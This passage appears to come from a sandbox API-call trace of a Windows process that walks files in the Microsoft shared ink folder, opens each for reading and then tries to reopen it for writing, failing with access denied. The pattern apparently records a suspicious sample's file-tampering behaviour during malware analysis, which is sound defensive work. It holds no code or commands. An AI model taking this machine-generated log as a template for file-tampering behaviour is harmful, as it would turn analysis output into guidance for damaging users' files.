Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.753] AreFileApisANSI () returned 1 [0083.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu", lpUsedDefaultChar=0x0) returned 73 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.754] AreFileApisANSI () returned 1 [0083.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0083.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 73 [0083.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.754] GetLastError () returned 0x5 [0083.754] GetLastError () returned 0x5 [0083.754] SetLastError (dwErrCode=0x5) [0083.754] GetLastError () returned 0x5 [0083.754] SetLastError (dwErrCode=0x5) [0083.754] GetLastError () returned 0x5 [0083.754] SetLastError (dwErrCode=0x5) [0083.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0083.754] AreFileApisANSI () returned 1 [0083.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0083.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 73 [0083.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.754] GetLastError () returned 0x5 [0083.755] GetLastError () returned 0x5 [0083.755] SetLastError (dwErrCode=0x5) [0083.755] GetLastError () returned 0x5 [0083.755] SetLastError (dwErrCode=0x5) [0083.755] GetLastError () returned 0x5 [0083.755] SetLastError (dwErrCode=0x5) [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0083.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.755] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0083.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.755] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0083.756] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.756] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0083.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.757] AreFileApisANSI () returned 1 [0083.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpUsedDefaultChar=0x0) returned 89 [0083.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0083.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.758] AreFileApisANSI () returned 1 [0083.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0083.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x51398 [0083.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 89 [0083.758] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.759] GetFileType (hFile=0x340) returned 0x1 [0083.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.759] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.759] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.759] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.759] CloseHandle (hObject=0x340) returned 1 [0083.759] AreFileApisANSI () returned 1 [0083.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0083.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x51398 [0083.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 89 [0083.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.760] GetLastError () returned 0x5 [0083.760] GetLastError () returned 0x5 [0083.760] SetLastError (dwErrCode=0x5) [0083.760] GetLastError () returned 0x5 [0083.760] SetLastError (dwErrCode=0x5) [0083.760] GetLastError () returned 0x5 [0083.760] SetLastError (dwErrCode=0x5) [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0083.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.760] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xb0, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x80a38, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xb0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Ǘ")) returned 0 [0083.760] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0083.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.761] AreFileApisANSI () returned 1 [0083.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml", lpUsedDefaultChar=0x0) returned 77 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0083.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0083.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.761] AreFileApisANSI () returned 1 [0083.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0083.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0083.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned 77 [0083.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.762] GetFileType (hFile=0x42c) returned 0x1 [0083.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.762] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.762] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.762] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.762] CloseHandle (hObject=0x42c) returned 1 [0083.763] AreFileApisANSI () returned 1 [0083.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0083.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0083.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned 77 [0083.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.763] GetLastError () returned 0x5 [0083.763] GetLastError () returned 0x5 [0083.763] SetLastError (dwErrCode=0x5) [0083.763] GetLastError () returned 0x5 [0083.763] SetLastError (dwErrCode=0x5) [0083.763] GetLastError () returned 0x5 [0083.763] SetLastError (dwErrCode=0x5) [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0083.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 